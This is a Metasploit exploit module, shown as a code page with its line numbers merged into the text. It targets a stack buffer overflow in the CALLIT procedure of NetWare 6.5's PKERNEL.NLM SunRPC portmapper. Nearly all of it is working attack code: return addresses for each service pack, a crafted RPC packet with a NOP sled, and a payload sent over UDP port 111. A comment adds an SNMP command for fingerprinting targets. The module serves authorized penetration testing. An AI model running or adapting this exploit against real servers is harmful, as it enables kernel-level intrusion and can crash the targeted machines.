Path: blob/master/modules/exploits/netware/sunrpc/pkernel_callit.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.17PKERNEL.NLM is installed by default on all NetWare servers to support NFS.18The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can19cause the operating system to reboot.20},21'Author' => [ 'pahtzo', ],22'License' => MSF_LICENSE,23'References' => [24# There is no CVE for this vulnerability25[ 'BID', '36564' ],26[ 'OSVDB', '58447' ],27[ 'ZDI', '09-067' ],28],29'Privileged' => true,30'Payload' => {31'Space' => 202032},33'Platform' => 'netware',34'Targets' => [35# NetWare SP and PKERNEL.NLM version can be found in SNMP:36# snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"37# sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 200838# hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"39[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)40[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)41[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)42[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)43[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)44[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)45[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)46],47'Notes' => {48'Stability' => [ CRASH_OS_RESTARTS ],49'SideEffects' => [ IOC_IN_LOGS ],50'Reliability' => [ UNRELIABLE_SESSION ]51},52'DisclosureDate' => '2009-09-30'53)54)5556register_options([Opt::RPORT(111)])57end5859def exploit60connect_udp6162buf = [rand(0xffffffff)].pack('N') # XID63buf << [0].pack('N') # Message Type: Call (0)64buf << [2].pack('N') # RPC Version: 265buf << [100000].pack('N') # Program: Portmap (100000)66buf << [2].pack('N') # Program Version: 267buf << [5].pack('N') # Procedure: CALLIT (5)68buf << [0].pack('N') # Credentials AUTH_NULL (0)69buf << [0].pack('N') # Length: 070buf << [0].pack('N') # Verifier AUTH_NULL (0)71buf << [0].pack('N') # Length: 072buf << [0].pack('N') # Program: Unknown (0)73buf << [1].pack('N') # Version: 174buf << [1].pack('N') # Procedure: proc-1 (1)75buf << [4097].pack('N') # Arguments: <DATA> length: 40977677buf << make_nops(2072) # fill to ret78buf << [target.ret].pack('V') # addr. of push esp - ret79buf << payload.encoded #8081# print_status("payload space #{payload_space()}...")82# print_status("payload len #{payload.encoded.length}...")83# print_status("total buf len #{buf.length}...")8485print_status("Trying target #{target.name}...")8687udp_sock.put(buf)88handler89disconnect_udp90end91end929394